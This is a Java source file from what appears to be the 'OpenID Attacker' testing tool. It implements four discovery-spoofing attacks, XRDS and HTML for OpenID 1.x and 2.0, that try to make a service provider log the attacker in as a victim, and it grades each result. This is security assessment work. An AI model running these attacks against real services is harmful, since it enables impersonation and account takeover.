/*
* OpenID Attacker
* (C) 2015 Christian Mainka & Christian Koßmann
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software
* Foundation; either version 2 of the License, or (at your option) any later
* version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc., 51
* Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
package wsattacker.sso.openid.attacker.evaluation.attack;
import org.apache.commons.lang3.SerializationUtils;
import wsattacker.sso.openid.attacker.config.OpenIdServerConfiguration;
import wsattacker.sso.openid.attacker.discovery.html.HtmlDiscoveryConfiguration;
import wsattacker.sso.openid.attacker.discovery.xrds.OpenIdVersion;
import wsattacker.sso.openid.attacker.discovery.xrds.XrdsConfiguration;
import wsattacker.sso.openid.attacker.evaluation.LoginResult;
import wsattacker.sso.openid.attacker.evaluation.ServiceProvider;
import wsattacker.sso.openid.attacker.evaluation.attack.AttackResult.Interpretation;
import wsattacker.sso.openid.attacker.evaluation.attack.AttackResult.Result;
import wsattacker.sso.openid.attacker.evaluation.ServiceProvider.User;
public class DiscoverySpoofingAttack extends AbstractAttack {
private HtmlDiscoveryConfiguration htmlConfigCopy;
private XrdsConfiguration xrdsConfigCopy;
public DiscoverySpoofingAttack(ServiceProvider serviceProvider) {
super(serviceProvider);
}
@Override
protected void beforeAttack() {
super.beforeAttack();
// copy of HTML and XRDS Discovery information by serialization
htmlConfigCopy = SerializationUtils.clone(serverController.getConfig().getHtmlConfiguration());
xrdsConfigCopy = SerializationUtils.clone(serverController.getConfig().getXrdsConfiguration());
}
@Override
protected void afterAttack() {
super.afterAttack();
// reset HTML and XRDS Discovery information
serverController.getConfig().setHtmlConfiguration(htmlConfigCopy);
serverController.getConfig().setXrdsConfiguration(xrdsConfigCopy);
}
@Attack(number = 0)
private AttackResult performXrdsDiscoverySpoofingAttackWithOpenId2() {
OpenIdServerConfiguration.getAttackerInstance().setPerformAttack(true);
// XRDS Discovery Spoofing - OpenID 2.0
XrdsConfiguration xrdsConfiguration = serverController.getConfig().getXrdsConfiguration();
xrdsConfiguration.setOpenIdVersion(OpenIdVersion.VERSION_20_CLAIMED_IDENTIFIER_ELEMENT);
xrdsConfiguration.setIncludeIdentity(true);
xrdsConfiguration.setIdentity(serviceProvider.getVictimOpenId());
HtmlDiscoveryConfiguration htmlConfiguration = serverController.getConfig().getHtmlConfiguration();
htmlConfiguration.setOpenidServer(false);
htmlConfiguration.setOpenId2Provider(false);
htmlConfiguration.setIncludeIdentity(false);
htmlConfiguration.setIdentity(serviceProvider.getAttackerOpenId() + "?xrds");
htmlConfiguration.setIncludeXrdsHttpHeader(true);
LoginResult loginResult = serviceProvider.loginAndDetermineAuthenticatedUser(ServiceProvider.User.ATTACKER);
boolean success = loginResult.getAuthenticatedUser() == User.VICTIM;
Result result = success ? Result.SUCCESS : Result.FAILURE;
Interpretation interpretation = success ? Interpretation.CRITICAL : Interpretation.PREVENTED;
if (!loginResult.hasXrdsDiscovery()) {
result = Result.NOT_DETECTABLE;
interpretation = Interpretation.NEUTRAL;
}
assert isSignatureValid(loginResult) : "Signature is not valid!";
return new AttackResult("XRDS Discovery Spoofing - OpenID 2.0", loginResult, result, interpretation);
}
@Attack(number = 1)
private AttackResult performXrdsDiscoverySpoofingAttackWithOpenId1() {
// XRDS Discovery Spoofing - OpenID 1.0
XrdsConfiguration xrdsConfiguration = serverController.getConfig().getXrdsConfiguration();
xrdsConfiguration.setOpenIdVersion(OpenIdVersion.VERSION_11);
xrdsConfiguration.setIncludeIdentity(true);
xrdsConfiguration.setIdentity(serviceProvider.getVictimOpenId());
HtmlDiscoveryConfiguration htmlConfiguration = serverController.getConfig().getHtmlConfiguration();
htmlConfiguration.setOpenidServer(false);
htmlConfiguration.setOpenId2Provider(false);
htmlConfiguration.setIncludeIdentity(false);
htmlConfiguration.setIdentity(serviceProvider.getAttackerOpenId() + "?xrds");
htmlConfiguration.setIncludeXrdsHttpHeader(true);
LoginResult loginResult = serviceProvider.loginAndDetermineAuthenticatedUser(ServiceProvider.User.ATTACKER);
boolean success = loginResult.getAuthenticatedUser() == User.VICTIM;
Result result = success ? Result.SUCCESS : Result.FAILURE;
Interpretation interpretation = success ? Interpretation.CRITICAL : Interpretation.PREVENTED;
if (!loginResult.hasXrdsDiscovery()) {
result = Result.NOT_DETECTABLE;
interpretation = Interpretation.NEUTRAL;
}
assert isSignatureValid(loginResult) : "Signature is not valid!";
return new AttackResult("XRDS Discovery Spoofing - OpenID 1.1", loginResult, result, interpretation);
}
@Attack(number = 2)
private AttackResult performHtmlDiscoverySpoofingAttackWithOpenId2() {
// HTML Discovery Spoofing - OpenID 2.0
HtmlDiscoveryConfiguration htmlConfiguration = serverController.getConfig().getHtmlConfiguration();
htmlConfiguration.setOpenidServer(false);
htmlConfiguration.setOpenId2Provider(true);
htmlConfiguration.setIncludeXrdsHttpHeader(false);
htmlConfiguration.setIncludeIdentity(true);
htmlConfiguration.setIdentity(serviceProvider.getVictimOpenId());
LoginResult loginResult = serviceProvider.loginAndDetermineAuthenticatedUser(ServiceProvider.User.ATTACKER);
boolean success = loginResult.getAuthenticatedUser() == User.VICTIM;
Result result = success ? Result.SUCCESS : Result.FAILURE;
Interpretation interpretation = success ? Interpretation.CRITICAL : Interpretation.PREVENTED;
if (!loginResult.hasHtmlDiscovery()) {
result = Result.NOT_DETECTABLE;
interpretation = Interpretation.NEUTRAL;
}
assert isSignatureValid(loginResult) : "Signature is not valid!";
return new AttackResult("HTML Discovery Spoofing - OpenID 2.0", loginResult, result, interpretation);
}
@Attack(number = 3)
private AttackResult performHtmlDiscoverySpoofingAttackWithOpenId1() {
// HTML Discovery Spoofing - OpenID 1.0
HtmlDiscoveryConfiguration htmlConfiguration = serverController.getConfig().getHtmlConfiguration();
htmlConfiguration.setOpenidServer(true);
htmlConfiguration.setOpenId2Provider(false);
htmlConfiguration.setIncludeXrdsHttpHeader(false);
htmlConfiguration.setIncludeIdentity(true);
htmlConfiguration.setIdentity(serviceProvider.getVictimOpenId());
LoginResult loginResult = serviceProvider.loginAndDetermineAuthenticatedUser(ServiceProvider.User.ATTACKER);
boolean success = loginResult.getAuthenticatedUser() == User.VICTIM;
Result result = success ? Result.SUCCESS : Result.FAILURE;
Interpretation interpretation = success ? Interpretation.CRITICAL : Interpretation.PREVENTED;
if (!loginResult.hasHtmlDiscovery()) {
result = Result.NOT_DETECTABLE;
interpretation = Interpretation.NEUTRAL;
}
assert isSignatureValid(loginResult) : "Signature is not valid!";
return new AttackResult("HTML Discovery Spoofing - OpenID 1.0", loginResult, result, interpretation);
}
}
